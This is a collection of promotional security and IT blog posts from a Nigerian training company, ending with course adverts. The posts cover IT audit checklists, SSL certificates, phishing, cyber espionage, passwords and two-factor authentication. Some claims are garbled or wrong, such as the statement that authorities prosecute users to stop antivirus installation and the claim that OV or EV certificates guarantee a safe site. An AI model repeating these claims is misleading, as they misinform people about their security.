  • Contingency planning
  • Backup procedures
  • Detective Controls: These involves finding any form of fraud when it occurs using:
  • Hash totals
  • Check points
  • Duplicate checking
  • Error messages
  • Past-due account reports
  • Review of activity logs
  • Preventive Controls: Preventive control measures include:
  • Programmed edit checks
  • Encryption software
  • Access control softwares
  • A well-designed set of procedures
  • Physical controls
  • Employ only qualified personnel

9.  Evaluate Controls: Simple Control Matrix

  • Test the Vocabulary

Compliance Testing:  A compliance test should take this form

  • Are there controls in place and are they consistently applied?
  • Check access control
  • Ensure program change control
  • Procedure documentation
  • Program documentation
  • Software license audits
  • System log reviews
  • Exception follow-ups

Substantive Testing:  Check the following:

  • Are transactions processed accurately?
  • Is data collected correct and accurate?
  • Double check processing
  • Calculation validation
  • Error checking
  • Operational documentation

If the results for the compliance testing are poor, the substantive testing should increase in type and sample number.

Compliance Testing: It should check the following

  • Control: Is production software controlled?
  • Test: Are production executable files built from production source files?
  • Test: Are proper procedures followed in their release?
  • Control: Is access to the sales database constrained to Least Privilege?
  • Test: Are permissions allocated according to documentation?
  • Test: When persons gain access to the database, can they access only what is allowed?

Substantive Testing

  • Audit: Is financial statement section related to sales accurate?
  • Test: Track the processing of sample transactions through the system by performing calculations manually
  • Test: Test error conditions
  • Audit: Is the tape inventory correct?
  • Test: Search for sample days and verify complete documentation and tape completeness

 Tools for IT Audits

ISACA has Standards and Guidelines related to Audit

  • Section 2200 General Standards
  • Section 2400 Performance Standards
  • Section 2600 Reporting Standards
  • Section 3000 IT Assurance Guidelines
  • Section 3200 Enterprise Topics
  • Section 3400 IT Management Processes
  • Section 3600 IT Audit and Assurance Processes
  • Section 3800 IT Audit and Assurance Management
  • Translate the basic audit objectives into specific IT audit objectives
  • Identify and select the best audit approach to verify and test controls
  • Identify individuals to interview
  • Obtain departmental policies, standards, procedures, guidelines to review
  • Develop audit tools and methodology

IT General Controls Check List

1. Documentation of employees and the organization

  • Draw an organizational Chart
  • Company
  • IT Department
  • Current Phone List/Company Directory
  • Job Descriptions for the IT Department
  • Sample of Employee Evaluation Form
  • List of all the terminations/ disengagements in the last 12 months.
  • Checklist of newly hired employees
  • Termination Checklist
  • IT Project List – Is it being planned, completed in the last 12months on its ongoing?
  • Review of the past year’s management response letter

2.       Documentation of IT policies and procedures

·   Obtain a network architecture diagram and documentation

·   Obtain a network diagram

·   Obtain a diagram and Lists of hosts and servers that are running financial applications

·   Change the management policies and procedures

·   Make an inventory of network hardwares and softwares

·   Determine the computer operations, its policies and procedures

·   Layer down security policies

·   Enforce password policies

·   Acceptable Use Policy

·   Layer down incident response policies

·   Get a curriculum for security awareness training

·    Configure firewalls and rule sets

·    Obtain software policies and procedures

·    Setup remote access policies

·    Setup policies for emails, instant messaging, internet usage

·    Develop a disaster recovery and business contingency plan

·    Setup policies for data backup and data recovery

·    Get backup logs

·    Offsite Tape Rotation Logs

·    Obtain a listing of IT related insurance coverage

·    Get copies of vendor contracts and service level agreements

·    Deploy an organized Help Desk with help desk request tracking forms and trouble tickets

·    Report open and closed tickets

·    Employ batch processing

 

When performing an IT audit, the responsibility of the auditor general is to check if the IT system complies with government IT policies, procedures, standards, laws and regulations. Also, the auditor general should endeavor to use IT audit tools, technical guides and recommended resources by ISACA where appropriate. The resources recommended by ISACA (Information systems Audit and control association should encourage IT audit staff and the team as a whole to be certified. Certifications include but a few;

  • CISA (Certified Information systems Auditor)
  • CIA (Certified Internal Auditor)
  • CISM (Certified Information Security Manager)
  • CGEIT (Certified in the Governance of Enterprise IT)

The Audit reports

After a successful audit process, the IT auditor needs to do a detailed documentation. Here is a list of a few things an auditor needs to include in the audit.

  • Plan and prepare the scope and objectives for the audit
  • Describe the scope of the audit area
  • Draft and audit program
  • Get down the steps performed and gather the audit evidence of the audit
  • If the services of other auditors and IT experts were used and what their contributions were.
  • Document your findings, make conclusions and recommendations
  • Document the audit in relation with document dates and identification
  • Report obtained as a result on the audit performed
  • An evidence of the review for audit supervisory

The audit results should be submitted to the organization upon exit where you can take out time to discuss in details your findings and recommendations. You should be certain of the following;

  • That all the facts and findings noted down on this report are accurate
  • That the recommendations you’ve made are cost-effective, more realistic and there are alternatives which should be negotiated with management
  • That the dates for the recommended implementation will be agreed.

There are some other things you need to consider when you’re preparing to present your final report. You need to consider the audience and if the presentation is going to be done to the audit committee. The audit committee may not be really notice the minutia that goes into the business report. Your report should be done in a timely manner so as to give way for any form of corrections.

Finally, if you come across a significant finding in the course of the IT audit, you should inform management immediately.

Always subscribe to Soutech Ventures where we can handle all your IT solutions especially in the areas of IT audits.

Also enroll for a cyber security, ethical hacking training at SOUTECH.

Secure Connections: What you need to know about SSL Certificates: SOUTECH Cybersecurity Tips and training in nigeria

The first purchase using an online transaction took place in a pizza hut, where the customer purchased a large pepperoni pizza with extra cheese and mushrooms. But 20years later on, ecommerce has become a bustling economy with over $1.2trillion sales in the year 2013.

The growth in online purchases was solidly built on the foundation of trust. By this I mean that people have grown to trust that when they make purchases on websites, these websites are proven to be legitimately and largely secured because of the Secure Socket Layer (SSL) certificates often found on the URL bar of your browser as a little green padlock.

An SSL certificate indicates first of all that there is a secure connection between your personal device and the company website. It also verifies that the provider is who they claim to be. It is very important that you understand the role of an SSL certificate to prevent you from being a prey to scammers and cybercriminals. This is because, not all the sites you visit that have SSL certificates as protection are created equal.

Certificate Authorities are known to provide SSL certificates and website owners purchase SSL certificates from these Certificate Authorities (CA). Different types of SSL certificates provide different levels and layers of security but there have been issues overtime. The issue is that in as much as these certificates provide that safety padlock that you have on your browser along with HTTPS (where “S” means “Secure”) also found on the address bar, the security levels provided by these certificates differ to a large extent. This is the reason why I’m trying help you understand what type of SSL certificate a website uses especially when you want to do any financial transactions and anything that is related to your personal financial credentials.

I’ll throw some more light on the types of certificates and how they work.

Types of Certificates

  • Domain Validator (DV): The domain validator simply verifies the owner of a site. In this case, the CA just has to send an email to the email which the website was registered with. This is done in order to verify the identity of the website owner. Many cybercriminals make use of the domain validator because they can obtain it easily and by so doing make the website appear to be very secure a lot more than it actually seems. Over time, cybercriminals have taken to using DV certificates to lure users to phishing websites i.e. websites that look legitimate but are crafted for the sole purpose of stealing a user’s sensitive data.
  • Organizational Validators (OV): The process of obtaining an OV takes a longer period. For and OV certificate to be obtained, the CA needs to validate some basic information such as the organization, the physical location of the organization and its website domain.
  • Extended Validator (EV): This is the highest level of security and often the easiest to identify with. The process of issuing an EV certificate tries to increase the level of confidence in the business by making the CA perform an enhanced review of the applicant. This process of review involves an examination of corporate documents, confirmation of the identity of the applicant and the checking through the third party’s database for information. This adds on the browser of the URL, the “S” that is a part of HTTPS, the company’s name in green and also the padlock.

Now take at these URLs and try to notice the difference. Now the first is the DV certificate, the second is an OV certificate which actually looks like the first. Only difference is the “.” Before the com.

Now the last one clearly is an EV certificate.

What can you do to be safe?

Now that you know what an SSL certificate is, its importance as well as the three different types. You have also known that an DV- enabled site poses a huge risk to be scammed, I’ll give out a few tips on how to reduce the risk when performing any form of online transaction that involves your sensitive credentials.

  1. Be Alert: Now the fact that a website has a padlock or HTTPS just by to its URL is not a guarantee that it is certified safe for financial transactions. Users are used to looking out for these two things before performing any transaction which is the more reason why the cybercriminals go through the trouble of obtaining the SSL certificates to which is obviously make it look legitimate.
  2. Look out for the SSL certificate type that a website has: The first thing you should do is to look for any visual cues that indicates security like a green color and a lock symbol in the address bar of your browser. Just a quick reminder once again that it is only an EV-enabled website that has the company name in the address bar. However, browsers do not clearly display the difference between a DV and an OV certificate so to enable you tell the difference, there is an open source tool (https://safeweb.norton.com/) developed by Norton that can help you. All you have to do is to simply copy the URL paste it directly into the tool. The tool will tell you if the site is a DV, OV or EV-enables and more explicit results to tell you if the site is legitimate and safe.

  1. Perform transactions only on OV and EV-enabled websites: If you analyze the URL on the tool I just explained above, and it gives you a result saying that the site has a DV certificate, have a rethink as regards conducting any transaction with that site. Now if it is an OV or EV-enable site, then you can conduct your transaction with confidence that your business information is safe.

The deployment of online transactions has come to stay and will not be phased out anytime soon. People will have to bear with the crude task of combatting with cybercriminals as regards phishing. I will tell you that knowing the risk before time keeps you knowledgeable on becoming a victim of phishing websites.

You can subscribe to our well detailed course in ethical hacking at soutech web consults to be learn about cybersecurity and how you can stay protected at all times

 

Protect yourself from Cyber Espionage: SOUTECH Ventures cyber security tips and techniques

Think of espionage with characters like James Bond, whereby you have to disguise yourself and to travel halfway around the world, infiltrating organizations to grab sensitive information. Although the James Bond character is just a fictional representation, such methods of spying however are becoming quite extinct. With the advancement of digitized data, we’re swiftly shifting towards the version of cyber-spying.

Espionage in recent times depicts the spying process entirely. Since Organisations and institutions store almost all their data on systems, cyber spies just stay on the confines of their computer desk and trot around in an attempt to hack into those systems.

Cyber espionage has over the years been a criminal case where authorities have to prosecute users to avoid them installing antivirus softwares and other security measures on their computer systems.

What is Cyber Espionage?

It is also called Cyber Spying and it is the act of using the internet to obtain sensitive secrets and information of an individual, a rival, competitor, a group or government for personal,  political and economic advantages.

A few Trends in Cyber Espionage

As revealed in Volume 20 of Symantecs Internet security Threat Report (ISTR), Regin and Turla were two highly versatile forms of malware that were being used in espionage.

Till date, Regin is one of the most sophisticated pieces of malware which has the characteristics of a chameleon by providing attackers with tools like screen captures, remote access, deleted file recovery network snooping,  and stealing as well.

On the hand, Turla works in a way that attackers use watering-hole tactics and spear-phishing  to launch attacks on the embassies of former Eastern Bloc countries and governments  as well.

 

Attackers have remote access to infected computers via Turla by helping them steal files, connect to servers, delete files and hosting spywares online.

Spear-phishing increased by 8% in the year 2014 and it came in form of spams with a few number of high-volume recipients because few individuals were targeted. As a result of these findings, the need to educate employees within organizations on best practices as regards internet usage has increased.

Who performs cyber Espionage?

Equation group and Hidden Lynx were the few prominent attack groups that were being highlighted by ISTR. And in addition to these attack groups, there are entities called the state actors which are acting on the behalf of government bodies, hacktivists, patriotic hackers, data thieves and scammers etc. are all involved in cyber espionage. While some attackers are after stealing of business intellectual property, others are after sensitive data belonging to government and some going as far as launching attacks on energy grids, industrial systems and petroleum pipelines.

How Cyber Espionage is Performed

The process of carrying out cyber espionage is often a very complex process and does not just involve dumping some malware on a target system, it involves a more sophisticated process whereby the chose their targets and the type of information they’re aiming to steal and look forward to cause some level of damage.

Infiltration is not just the process where the attacker tries to exploit some zero day software vulnerability in the quest to gain access to an organizations network but he tries to find a software vulnerability within the network of an organization and also the network of individuals working in the organization. An attack of this sort sometimes requires some human factor of social engineering like phishing campaigns in order to succeed.

As you may know already, when an attacker wants to target a person, they will try to go online and carry out some reconnaissance on them, they look for social media sites, blogs or anything that will give them some extra information on their victim’s interests. They often use any information gathered to narrow their phishing campaigns towards areas that may be attention-catching to their targets. Once they have succeeded in getting their attention, they can go ahead to lure them into opening the emails, clicking on the malicious links or downloading some malicious software onto their system.

If the victim is able to complete that particular task, the malware will be installed on the computer of the victim thereby giving the attacker access to the network where they can perform their intended mission of espionage.
How to keep your organization and Information safe from Cyber espionage

  • Protect your Passwords: Always protect your passwords because it is a very handy weapon in the hands of a cybercriminal. If a cybercriminal gets a hold of your password, username and email address, they can use specially crafted tools to crack your password. The use of Two-factor authentications when available are also advised. You can read more on password protection.
  • Be on the watch for any forms of phishing attacks. Educate yourself on the downsides of phishing. And always try to identify spoofed emails. Read more on phishing.
  • Learn more about software security. Always perform software updates on a regular basis once there are any available updates. Softwares are usually patched of loopholes- the reason updated versions. So, leaving your programs or softwares outdated can create room for loopholes which an attacker can harness.
  • Protect your social media accounts: Like I said earlier, attackers often do research on their targets before making any attempts to attack so always ensure to that the privacy settings of your social media accounts are in check. Always prevent any personally information from public view and be wary of people you do not know trying to be contact with you.
  • Bring Your Own Device (BYOD):Always ensure that you put in place some kind of device control mechanism that will protect you against data leakage. This will not only allow certain external devices but it will also encrypt your data. When data is used later on a different system inside the company’s environment, the 7mdash standard automatically decrypts it and makes it usable but when loaded on a system without a device control mechanism, it will become automatically useless.
  • Ensure that a device control mechanism is put in place such that it can safeguard your system against data leakage. Not only can it only allow certain (USB) devices to be inserted, it will also encrypt the data. When the data is later used on another system inside the company’s environment, the data will automatically be decrypted 7mdash; and thus usable — but when copied to a system that does not have the Device Control Mechanism installed, it will be useless.

There has been no concrete manual on how to ensure protection from targeted attacks of intellectual property. In environments where this type of attack is small-scaled, it can appear completely undetected. Staying security-educated via security vendors’ websites such as soutech ventures keeps you appraised with new threats and how to protect yourself. You can be well educated on how to keep your intellectual property from cyber espionage.

 

 

Cybersecurity and Ethical Hacking training: Protect yourself From Phishing scams- SOUTECH Web Consults

I will define phishing as an online con game where a cyber criminal disguises as a trusted entity and attempts to obtain sensitive information such as passwords, user account names, credit card credentials from a user via email which is often for malicious purposes.

A person who takes part in this sort of crime is known as a phisher. To throw more shade, they can use SPAM, email messages, malicious websites as well.

So How Do You Know It is a Scam?

Phishing can take different forms where the cyber criminal may trick you by luring you into giving them your personal details via

  • Social media messages (Whatsapp, Facebook, twitter, LinkedIn, etc.) and other popular sites like dating sites.
  • IMs
  • Text messages
  • Internet Chat rooms.

Sometimes they can go to the extent of luring you to install a malicious software or program often known as spywares. These spywares have background payloads which can track and record your passwords and other information you may enter on your computer through keyloggers.

I’ll list a few warning tips and signs you should look out for as concerning Phishing;

  • Phishers always disguise to be legitimate companies and use emails to request for your personal information and they have people on standby to respond through their malicious websites. They have been known to always make use real company logos and slogans and often a spoofed email address.
  • These emails may take the form of a message from your bank, a customer care agent or help desk support soliciting for money.
  • Often times they can use a call to action which you may get that your account has been shut down and that you need to log in your details immediately in order to stop it from happening. They may also demand for your personal information so they can verify your identity.
  • The phishing websites can look very original and remarkably legitimate because they make use of copyrighted images from the original websites belonging to the organization.
  • If you look at the URLS and messages, you will notice they are often bogus or being misspelt including the company names.

Phishing Countermeasures

So now that you know the various forms in which Phishing can take, I’ll explain in just a few tips how to stay protected.

  • The first thing to do when you receive any emails from your financial institution, check the URL of the website, copy it and paste in your browser and ensure it https:/ verified at the beginning of it in the task bar. https means it is a protected or secure website.

A Typically Phished URL

 

  • Always check the email header example to know the sender of the mail and other details you can capture from the header. I’ll use Gmail for instance to demonstrate to you how to check the email header.

Login to your Gmail>>Open the message>>Click on the dropdown button close to the reply tab>>Click on “Show Original”

 Illustration Of a typical Email Header

When you do this, you can see the header. Other email platforms have their own paths to get to the headers. You can do a little research on it if you are a yahoo, Hotmail etc. users.

You can boycott all these procedures if you just need the email id by just checking the top of the email to take note of the email id.

  • Do not give out any of your personal information via email, social media chatting platforms, text messages or instant messaging platforms.
  • Some financial institutions send monthly review of your account statements and require that you download and view them. Criminals also take this form to send programs that have keyloggers and spywares attached to them.

So, do not download any program or file from a suspicious email. You can as well block them.

To block any suspicious mail also using Gmail as template;

Login to Gmail>>open the message>>Click on the dropdown button close to the reply tab>>Click on Block

 

Blocking a suspicious email

Remember to always stay protected, stay alert against all forms of online malicious threats. Stay glued to our well-informed journals to get more tips on how to stay protected. You can subscribe to our Ethical Hacking course in SOUTECH ventures to get more grounded information on Internet security.

 

Google Chrome has developed patches to fix 30 vulnerabilities

Google chrome has developed stable channel updates mainly for Linux, Mac, and Windows desktops thereby patching 30 security flaws such that if an attacker can exploit them, they can have full control of a system.  In a press release on June,5 2017, 5 highly rated flaws among a host of other vulnerabilities were singled out which included

  • out of bounds read in version 8
  • type confusion in version 8
  • use after in print preview
  • Address spoofing found in Omnibox
  • Use after free in Apps Bluetooth flaws

Google Chrome 59.0.3071.86 contains a lot of fixes and modifications although there may be restrictions to access details of the flaws and links until majority of users are updated with a patch with all the flaws.

The release also had it that, Google retains restrictions if there exist bugs in the third party library which other projects may also be depending on but have not yet been fixed.

Computer users and admins are hereby advised to update all the affected systems immediately.

STAY PROTECTED.

 

Two-Factor Authentication: What you don’t know can harm your IT infrastructure( Softwares and Hardware Devices)

Employing secure passwords is now more important than you could ever think. The fact that passwords have substantial monetary values attached to them, gives hackers the reason to hack them. Data breaches and password leaks have constantly developed media attention over the years, thereby leaving millions of user accounts vulnerable or susceptible to being accessed by cybercriminals.

In order to create an extra layer of security to prevent easy access by hackers, you will need to understand the importance of the two-factor authentication mechanism and employ it. This is simply because, a cybercriminal needs more than just your username and password credentials to perform attacks. The truth is that you may be actually using the two-factor authentication without knowing what it actually is. A common example where this mechanism is deployed is your ATM cards as it uses both your card itself and your 4-pin number.

I’ll quickly explain the concept of the 2FA (a brief for Two-factor authentication) which I’ll be using more frequently in this writeup.

What is the 2FA?

The 2FA is an extra layer of security which can also be referred to as multi-factor authentication which requires not only a username and password but also requires something that only a dedicated user has on them.  By this I mean a piece of information only they only should know and can provide by hand whenever its needed. An example is a physical token.

                      

How do you deploy 2FA?

Based on the definition above, A 2FA mechanism should require the following of you,

  1. It should be something that you know and are used to ex- A Pin Number, a pattern or password.
  2. It should be something that you have example; A credit or ATM card, a mobile phone or security token (a key fob or USB token)
  3. Finally, it should be something that is unique to you example, A bio-metric authentication such as a voice print and a fingerprint.

            Core components of a Two-Factor Authentication

How Strong is a Two-Factor Authentication?

As you well know, nothing is in its actual sense 100% safe or secure, and as such account is still prone to hacking through some social engineering means such as a shoulder surfing and other password recovery options. Take a instance if you’re performing a password reset in cases where you forgot your password, retrieving it by email can totally bypass the 2FA mechanism. Now if an attacker has access to your email account which you linked your 2FA to, he can capture your password directly to perform an attack on you.

My emphasis is that you always monitor your email account for phishing emails and those ones that carry messages requesting for password changes.

What are the downsides of this security mechanism?

The shortcoming of this security mechanism is that the new hardware tokens which take the form of key fobs and card readers always need to be reordered and this can slowdown business for the company. This is so because customers are always wanting and waiting to gain access to their own private information using this means of authentication.

                          A Typical Hardware Token

Tokens are also usually small and can be easily lost thereby causing more problems for everyone especially when clients are on the waiting list for them.

I’ll also shade a little light on some password security measures you should know coupled with the 2FA

  1. Many or millions of people have taken to using birthdates, phone numbers, addresses and words as passwords. These are the passwords that can easily be cracked by performing dictionary attacks and brute force attacks.
  2. Avoid using the same password across multiple accounts.
  3. Take it as a culture to employ user passwords that are 8 characters at least and always make use of a unique combination of both lowercase and uppercase letters, numbers, stringed characters and numbers as well.

In Conclusion, the use of the 2FA mechanism can go a great length to lower the number of cases of phishing via emails and online identity theft, because the hacker will require just more than the users name and password credentials as explained earlier.

Using a Two Factor Authentication process can help to lower the number of cases of identity theft on the Internet, as well as phishing via email, because the criminal would need more than just the users name and password details.

To get more information on this and many more security information, we at Soutech web Consultants have a comprehensive list of courses that cover all you may need to know about online security and basic internet safety tips you should know as well as the countermeasures.

Subscribe to our ethical Hacking Course today via www.soutechventures.com/courses to learn a course today.

Smart Passwords: The key to Information Security and why you should create it well and guard it.

Hello dear reader, in my previous journal on two-factor authentication, I discussed in detail about the two-factor authentication mechanism which I have decided to follow up with a discussion on password attacks.

In real life, we find ourselves having to use passwords every time. Our banking credentials (ATMs, mobile apps etc.), our personal computers, mobile devices are all password driven.

As a key is to a driver, so is a password to a hacker. Although passwords do not seem to have much value but the personal and confidential information which they conceal and store give them much value. So always look at your password more like digital keys which are gateways to your personal life, your network of friends, family, colleagues, contacts, photos, videos, emails, bank and payment details among a host of other private information.

If you have a weak password i.e. a password that can easily be guessed therefore taking poor security measures could give a provide information to the hacker. However, you can frustrate the efforts and attempts of a hacker in breaking into your system by implementing strong password security measures.

The mechanism which hackers use to grab your passwords are not some magical or exotic methods. Sometimes they do password guessing, information form social media and can employ some password cracking techniques.

Dictionary Attack

A dictionary attack can be performed using a dictionary file containing a list of the common words that are often combined in passwords. Weak passwords such as those with words and phrases are the easiest for this program file to guess. To keep your account protected from a dictionary attack, the solution is to avoid the use of words and phrases as passwords.

Furthermore, I’ll list a few other ways to stay protected from this attack which are;

  1. Ensure not to use the same password across different applications and websites
  2. Do not write down your passwords on your diaries or notepads or share them with anyone
  3. Make use of the 2FA (two-factor authentication) whenever an extra layer of protection is required in your account. This is important because if a hacker discovers your password, they will still need to do a second factor approach to hacking your account.
  4. Develop a policy to change your passwords regularly. A policy can be a 3 months policy.

Security Tips on Social Media

One of the goldmines for information gathering is our social media accounts through our status updates, location sharing, likes, comments and posts. All these online activities go a long way to provide information about our personal lives. So, think about getting a new job, getting a new pet, moving to a new apartment in another location, and you may want to share all this experiences and activities. Also think about telling your contacts about your new friends, or displaying the name of your high school. These as well are all personal details which the hacker can readily grab to perform an attack.

Let me share a few Password and social media tips

  • Do not broadcast your personal details which maybe clues to compromise your password.
  • Avoid using your personal information of any sort in your password
  • If you observe that someone on your contact that you do not know sends you links, just quietly block them from your contacts.
  • Ensure to report any spam account you notice. When you do this, the social networking site takes note of such accounts and removes them.
  • Employ the use of Norton Safe Web for Facebook. This is free application from Norton that helps to scan your newsfeeds for any kind of malicious link and informs you of any potential threat.

Password Crackers

A password cracker attempts to crack a password by using brute force method. It tries a combination of a million characters repeatedly until the password is discovered. Short passwords as well as simple passwords are easier and faster to guess by a password cracker. Meanwhile, a long password and complex password will take a longer time and can be frustrating to crack. In cases such as this, the hacker may likely deploy the dictionary attack because of the long time it will take for it to crack the password. I always advice the use of passphrases. Passphrases are passwords that consist of a sequence of words put together.

Creating Complex Passwords

  • Avoid using your phone numbers, your birthdays or family members and your SSN or your name, the name of a pet as well.
  • Avoid the use of commonly used passwords such as; ‘12345’, ‘incorrect’, ‘password’, ‘qwerty’ and words like ‘apple’
  • Always use the combination of uppercase and lowercases, including numbers, symbols as well.

 How to create a complex password

  • Never use phone numbers, addresses, birthdays, your SSN or your name, the name of a family member or pet in your password.
  • Use a combination of uppercase and lowercase letters, numbers and symbols in your passwords.
  • If you must use short phrases and words always misspell them including abbreviations. If you decide a word like ‘eleven’ you can decode it like this ‘e13v3n or a word like ‘I love You’, you can use ‘1l0v3y0u’ to make it some-worth complex. Take time to explore your options.
  • There are online password generators you can also use to assist your decision on passwords

Password security tips for your Mobile devices

  • Ensure the use of passwords on your mobile devices to prevent unauthorized persons from gaining access to your personal information. You can opt for an extra layer of security that is beyond the usual 4-digit pin. If use an iOS user, you can change it to lengthy alphanumeric codes which in your iPhone settings.

  • Ensure your device auto-locks when you’re not using it. It can be timed as well.
  • There are apps as well that can provide mobile security on your phone just to get an extra security to sensitive information on your phone. Some can also lock the applications.

 

What to do if you think your password has been stolen

Once you noticed your account has been hacked;

  • Frist thing to do is to determine the type of attack that was done, if it was an online breach or from a POS.
  • Try to monitor the compromised account or accounts especially when your banking accounts are involved.
  • Then you can go ahead to change your password to a complex one and do that across all your accounts.
  • Implement the two-factor authentication whenever there is a provision for it.

There are courses that can help you learn more about internet protection, your passwords and other information you may need to stay protected from any form of cyberattack. Subscribe to an Ethical Hacking course which is a well packaged course to guide you through cybersecurity.  Contact US TODAY

Learn smart website design( ecommerce , company and blog websites) within days- SOUTECH Academy

So you really want to be a website designer? Well, website designing is very interesting and website designers around the world earn some reasonable amount of wages. It is a process of bringing in concepts and ideas into a functional reality.

WHY WEBSITE DESIGN?

As a website designer, you have many options to choose from when it comes career choices. A website designer has some sets of I.T. skills that put the individual in the positions such a website consultant, creative content creator, website administrator, webmaster, website theme developer, plugins developer, theme and plugin customization expert, blogger and much more.

A website designer possesses the ability to design and lunch a functional website or blog, and can also manage and maintain websites including creating contents for various websites, consulting and training other people on website designing. Website design comes with many opportunities, giving you enough room for work flexibility as you can choose to work from anywhere all you need is a computer devices and internet service. You can become a website designer by spending three (3) days with Soutech Web Consult for an intensive website design training and become an expert in less than one month.

WHY SOUTECH WEB CONSULT

Soutech offers various I.T trainings such as Certified Ethical Hacker, Website Design, Web Development, Mobile App, Digital Marketing and many more. Visit www.Soutechventures.com/courses to learn more. Soutech trainings are hands-on emphasizing on relevant areas with over 30 days’ mentorship giving you an opportunity to have you own website for practical practices and experience.  The training labs are conducive in a serene environment that gives you comfort throughout your training period.

THE NEED OF WEBSITE DESIGN

The need of website design is based on the demand of websites.

A website is the single most important marketing tool for any business. It serves as a virtual equivalent of a physical business for the over 3 billion internet users. Think about it: when you want to learn more about a company, you typically turn to Google and search about the company and most times you eventually end up on their website. The same process happens when you are looking for products and services.

As a web development and marketing services company, whenever someone searches for Soutech Web Services, they’ll usually hit our website as the main source to learn about our services, our work, and about the team.

Now, for any organisation that offers services, users will certainly turn to past clients and case studies section of a website. So much information is gained by users browsing a website: what users see and read shapes the perception of the company or brand in the user’s decision-making. According to Statista, over 2 billion people are expected to buy goods and services online by the year 2019. So, having the best content on your website is important so that your website acts as your main marketing tool.

A well-built website should be mobile-responsive, and important aspect to consider based on the fact that it contribute in making a website the most important marketing tool as more and more users browse the web on smartphones (more than desktop usage now, according to Google). Any organisation that desire growth cannot afford to miss out on opportunities for new leads by not having a responsive website.

So there you have it – a website is the most important marketing asset, not just because it acts as a salesperson and a brand ambassador, but because it can be use to genuinely connect with potential customers, whether that’s through engaging content, mobile-responsive layout, or intelligent analytics and personalization. If a website isn’t hitting all these goals, that’s all right. It’s definitely an interactive process, and few if any websites can accomplish everything they need to right out of the gate. It is imperative that one should add these goals to an overall inbound marketing strategy and work on executing them, by doing so, there is assurance that a business will continue to grow. That is what all organisation wants “Grow” hence the will seek the services of someone with the ability to activate that growth through digital presence which is where you will come in as a website designer.

So are you ready? The first step is to visit www.soutechventures.com/courses and give us a call today.

Digital marketing services in abuja, port harcourt nigeria

THE 10 BENEFITS OF DIGITAL MARKETING

Internet marketing is essential because it supports with the way consumers make purchasing decisions, while enables building relations with customers and prospects through regular, low-cost personalized communication and reflecting the move away from mass marketing.

Consumers are progressively turning to the Internet for their buying decisions. This makes Internet marketing more important than ever before. According to studies, to carry out initial price and product research, consumers are turning to research on mobile Internet and social media before making their final purchasing decisions.

Of you yet to be convinced that Internet marketing is the direction your company should go in? Then, I leave you with ten benefits of Internet marketing listed below to help change your mind.

All-Hour Based Marketing

Internet marketing is all-hour based. Your marketing campaigns run 24 hours a day , 7 days a week. you aren’t constrained with opening hours, neither are you to consider overtime payment for staff. The availability or reachability of your online ads copy campaign and offer cannot be affected by international time variation. Anytime an individual opens a computer connected to the internet, S/he’s tendency to see your marketing campaign as opposed to usual traditional offline marketing. Customers search the products offered at their convenient time as long as they like – no hasten, no fear of closing. The users own the opening and closing hours for shopping.

Convenience

Internet marketing gives you the preference to be open for business around the clock without worrying about business resumption hours or overtime payments for staff. Offering your products on the Internet is also convenient for customers. They can browse your online store at any time and place orders when it is convenient for them.

Reach

Overcoming barriers of distance is really easy by marketing on the Internet. You can sell goods in any part of the country without setting up local shops, widening your target market. You can also build an export business without opening a network of distributors in different countries. However, if you want to sell internationally, you should use localization services to ensure that your products are suitable for local markets and comply with local business regulations. Localization services include translation and product modification to reflect local market differences.

Internet Marketing is Cost-Effective

Internet marketing involves less or no start-up-capital. Starting a blog, social media or email marketing require less investment compared to traditional marketing which greatly lies on the factors of production – Land, capital, labour, entrepreneur. These are not prerequisite to online marketing and translate to reduced cost of production, advertising and marketing since no money is incurred on staffing, procurement of business premises and middlemen. We all know that I cost a huge amount running traditional marketing like newspaper, radio, television and banner, while fraction of such can run PPC advertising on Facebook, Google and other PPC companies.

Personalization

Internet marketing enables you to personalize offers to customers by building a profile of their purchasing history and preferences. One can make targeted offers that reflect interests or prospect simply by tracking the web pages and product information that the prospects visits. The information available from tracking website visits also provides data for planning cross-selling campaigns so that you can increase the value of sales by customer.

Relationships

Provision of important platform that builds relationship with customers and increasing customer retention levels comes from the internet. When a customer has purchased a product from your online store, you can begin the relationship by sending a follow-up email to confirm the transaction and thank the customer. A good way to maintain customer relationship is by emailing them regularly with special, personalized offers. You can also invite customers to submit product reviews on your website, helping to build a sense of community.

Social

Have you notice the growing importance of social media lately? One thing that will make you take advantage of that is Internet marketing. A group of consumers that responded most strongly to the influence of social networks generated increased sales of around 5 according to a paper by Harvard Business School Executive Education website, on a highlight regarding the link between social networking and online revenue growth. You can take advantage of this type of influence by incorporating social networking tools in your Internet marketing campaigns.

Residual and Continuity Effect

Inheriting residual effect is one of the great benefits of online marketing. years after the marketing campaign to a content or products is over, the content on websites and blogs remains functional and working to promote your products and services. E-book marketing produces long-term and viral effects after the production. For instance, If you run a campaign to improve traffic to your landing page, the residual power of such marketing remains effective years after the campaign might have been stopped.

Automation Versus Delegation

Another advantage of online marketing is the power of easy, one-mouse-click automation. Marketers often leverage the benefit of delegating best hands for various tasks in traditional offline business and marketing while internet marketing has a better time-savvy opportunity. That is the opportunity to get every aspect of your business fully automated. You search for the best tool for your marketing campaign and all is done. You have the option of spending your time in doing something else.

Convenient, Easy and Quick Service Delivery

Marketing online is incredibly convenient. It has easy accessibility. Consumers doesn’t incur any cost in reaching the internet markets anywhere in the world. This removes the cost of transportation to purchase goods across borders. Importers really enjoy this bonus as they make the online order right in the comfort of their home. Delivery process of sale items can easily be tracked online. Consumers get digital downloadable products on a click of mouse. What better experience is beyond shopping in the comfort of one’s room with a bottle of juice on a table for refreshment.

Take a digital marketing training today at Soutech Web Consult, and start enjoying benefits listed above.

Attend Digital Marketing Training this Friday:

Digital Marketing Practical Training in Abuja

Penetration Testing Training in Nigeria(Certified Ethical Hacking, Certified Penetration Tester,Certified Expert Penetration Tester and the Metasploit Pro Certified Specialist )

Expert Penetration Testing Course Overview

SOUTECH Web Consults Penetration Testing Training, delivered in the form of a 10 Day Boot Camp style course, is the information security industry’s most comprehensive penetration testing course available. You will learn everything there is to know about penetration testing, from the use of network reconnaissance tools, to the writing of custom zero-day buffer overflow exploits. The goal of this course is to help you master a repeatable, documentable penetration testing methodology that can be used in an ethical penetration testing or hacking situation. This penetration testing training course has a significant Return on Investment, you walk out the door with hacking skills that are highly in demand, as well as up to four certifications: CEH, CPT, CEPT and the MPCS!

HOW YOU’LL BENEFIT:

  • Gain the in-demand career skills of a professional security tester. Learn the methodologies, tools, and manual hacking techniques used by penetration testers.
  • Stay ethical! Get hands-on hacking skills in our lab that are difficult to gain in a corporate or government working environment, such as anti-forensics and unauthorized data extraction hacking.
